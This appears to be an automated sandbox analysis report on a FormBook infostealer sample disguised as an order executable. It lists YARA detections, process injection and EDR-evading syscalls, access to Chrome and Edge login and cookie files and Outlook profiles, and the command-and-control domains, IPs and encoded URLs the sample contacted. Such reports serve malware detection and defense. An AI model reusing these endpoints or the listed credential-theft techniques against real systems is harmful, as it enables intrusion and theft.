Source: C:\Users\user\Desktop\Order SO311180.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.Order SO311180.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Order SO311180.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3419404921.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2685441163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3420187302.0000000001280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3421857205.0000000004E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3421923997.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2685875397.0000000001380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3421898529.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2688650514.0000000001BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 3.2.Order SO311180.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Order SO311180.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.3419404921.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2685441163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3420187302.0000000001280000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3421857205.0000000004E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.3421923997.0000000004E80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2685875397.0000000001380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3421898529.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2688650514.0000000001BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545977 Sample: Order SO311180.exe Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 31 www.trifecta.center 2->31 33 www.thefokusdong43.click 2->33 35 5 other IPs or domains 2->35 45 Multi AV Scanner detection for submitted file 2->45 47 Yara detected FormBook 2->47 49 Yara detected AntiVM3 2->49 51 4 other signatures 2->51 10 Order SO311180.exe 3 2->10         started        signatures3 process4 file5 29 C:\Users\user\...\Order SO311180.exe.log, ASCII 10->29 dropped 63 Injects a PE file into a foreign processes 10->63 14 Order SO311180.exe 10->14         started        signatures6 process7 signatures8 65 Maps a DLL or memory area into another process 14->65 17 GfSuWuMUukRRDP.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 EhStorAuthn.exe 13 17->20         started        process11 signatures12 53 Tries to steal Mail credentials (via file / registry access) 20->53 55 Tries to harvest and steal browser information (history, passwords, etc) 20->55 57 Modifies the context of a thread in another process (thread injection) 20->57 59 3 other signatures 20->59 23 GfSuWuMUukRRDP.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 thefokusdong43.click 172.96.191.232, 49998, 49999, 50000 LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG Canada 23->37 39 owinvip.net 3.33.130.190, 49984, 49993, 49995 AMAZONEXPANSIONGB United States 23->39 41 www.seraph.best 52.20.84.62, 49989, 49990, 49991 AMAZON-AESUS United States 23->41 61 Found direct / indirect Syscall (likely to bypass EDR) 23->61 signatures15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
52.20.84.62
 www.seraph.best United States
14618 AMAZON-AESUS false
172.96.191.232
 thefokusdong43.click Canada
59253 LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG false
3.33.130.190
 trifecta.center United States
8987 AMAZONEXPANSIONGB false

Contacted Domains

Name IP Active
thefokusdong43.click 172.96.191.232 true
trifecta.center 3.33.130.190 true
owinvip.net 3.33.130.190 true
www.seraph.best 52.20.84.62 true
www.trifecta.center unknown unknown
www.thefokusdong43.click unknown unknown
www.owinvip.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.trifecta.center/4d7f/?yvsLS=4RrPNjhX4v&8XCl=GYb0rmyr/JAlLZNhnt/PbSIY/4LKqg5t8esebmIUXrwcEcXD+HGwSEbbxHn9xefIHUHI8DRuA6hSDuYZVaPcTdApV0AY1UFCgokq6TFyr/YFpy4hrd6Qy8FR+WKPf+6hCwHCnkk= false
    		unknown
    http://www.owinvip.net/o5fg/ false
      		unknown
      http://www.thefokusdong43.click/9rsa/ false
        		unknown
        http://www.seraph.best/qfwu/ false
          		unknown
          http://www.owinvip.net/o5fg/?8XCl=5onoMf6BmQl2QeVt/VrvVQYA8O/0+XqHKAgaJU0renyYnLBIrjMEkLORFTCyyhU0JhHfx4R92TWl4c733/RJZ98SsCn0nC0Ik21bS5JVWHE+LkgK3JQJVh0EnUQYNAjBF31c1vc=&yvsLS=4RrPNjhX4v false
            		unknown